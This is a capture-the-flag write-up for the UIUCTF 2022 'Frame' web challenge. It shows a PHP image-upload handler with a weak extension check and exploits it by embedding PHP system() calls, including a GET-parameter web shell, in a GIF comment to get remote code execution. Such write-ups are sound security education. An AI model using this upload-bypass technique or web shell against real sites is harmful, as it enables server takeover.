> For the complete documentation index, see [llms.txt](https://giongfnef.gitbook.io/giongfnef/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://giongfnef.gitbook.io/giongfnef/writeup-ctf/web/uiuctf-2022.md).

# UIUCTF 2022

## Frame

### [source](https://github.com/GiongfNef/ChallFile/blob/main/UIUCTF2022/frame/handout.tar)

![chall](/files/bJZXabmc8FLmCfMTllFF)

### Analysis

```
<?php
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
          if (isset($_POST["submit"])) {
            $allowed_extensions = array(".jpg", ".jpeg", ".png", ".gif");
            $filename = $_FILES["fileToUpload"]["name"];
            $tmpname = $_FILES["fileToUpload"]["tmp_name"];
            $target_file = "uploads/" . bin2hex(random_bytes(8)) . "-" .basename($filename);

            $has_extension = false;
            foreach ($allowed_extensions as $extension) {
              if (strpos(strtolower($filename), $extension) !== false) {
                $has_extension = true;
              }
            }
            
            if ($_FILES["fileToUpload"]["size"] < 2000000) {
              if (getimagesize($tmpname) && $has_extension) {
                if (move_uploaded_file($tmpname, $target_file)) {     
                  echo "<div id='frame'><img src='$target_file' alt='Your image failed to load :(' id='submission'></div>";
                } else {
                  echo "There was an error uploading your file. Please contact an admin.";
                }
              } else {
                echo "Your picture is not a picture and could not be framed.";
              }
            } else {
              echo "Your picture is too large for us to process.";
            }
          }
        ?>
```

* know that: $allowed\_extensions = array(".jpg", ".jpeg", ".png", ".gif"); -> we can use ".gif" extension file. Finding around and i got [<mark style="color:blue;">`this doc`</mark>](https://doddsecurity.com/94/remote-code-execution-in-the-avatars/)
* We can use `gifsicle`  to embedd PHP code that runs the Linux command into a malicious image named output.php.gif.

### Exploit

#### First way

* Firstly, we convert png file that we received from chall to gif file
* I have tried change file extension from png to gif but it doesn't work, of course.

![](/files/VEDfirfrKflOKJypVTXb)

* I convert by [online tool](https://cloudconvert.com/png-to-gif) and ... that works. After we that just use this command:

```
gifsicle < frame-1.gif --comment "<?php system('id'); ?>" > output.php.gif
```

* Upload the output gif to server:

![the path of our requesting](/files/qLph441SRcwb546K1dsF)

Go to that path and get some interesting things:

![](/files/0NV0znj5Satw30dGF8lu)

* It works, try other commands to rce :

```
gifsicle < frame-1.gif --comment "<?php system('ls /'); ?>" > output.php.gif
```

![Here yah gooooo](/files/5eor1xzQfXHvMn0m0mUG)

* Now just use rce command and got the flag:

```
gifsicle < frame-1.gif --comment "<?php system('cd / && cat flag'); ?>" > output.php.gif
```

![](/files/eAZMdieb0x7KIbZyCyPP)

flag in some confusing thing like this:

![](/files/372epmXfQZAS9koYAuGE)

#### Firstway but easier \~

```
gifsicle < frame-1.gif --comment '<?php echo system($_GET["command"]); ?>' > output.php.gif
```

Now we can rce ez by web shell

> /uploads/c654036b5974c786-output.php.gif?command=ls%20-a

![](/files/v23oUZXkckKC6qqJQptx)

Thanks for reading. Have a good day :heart: !
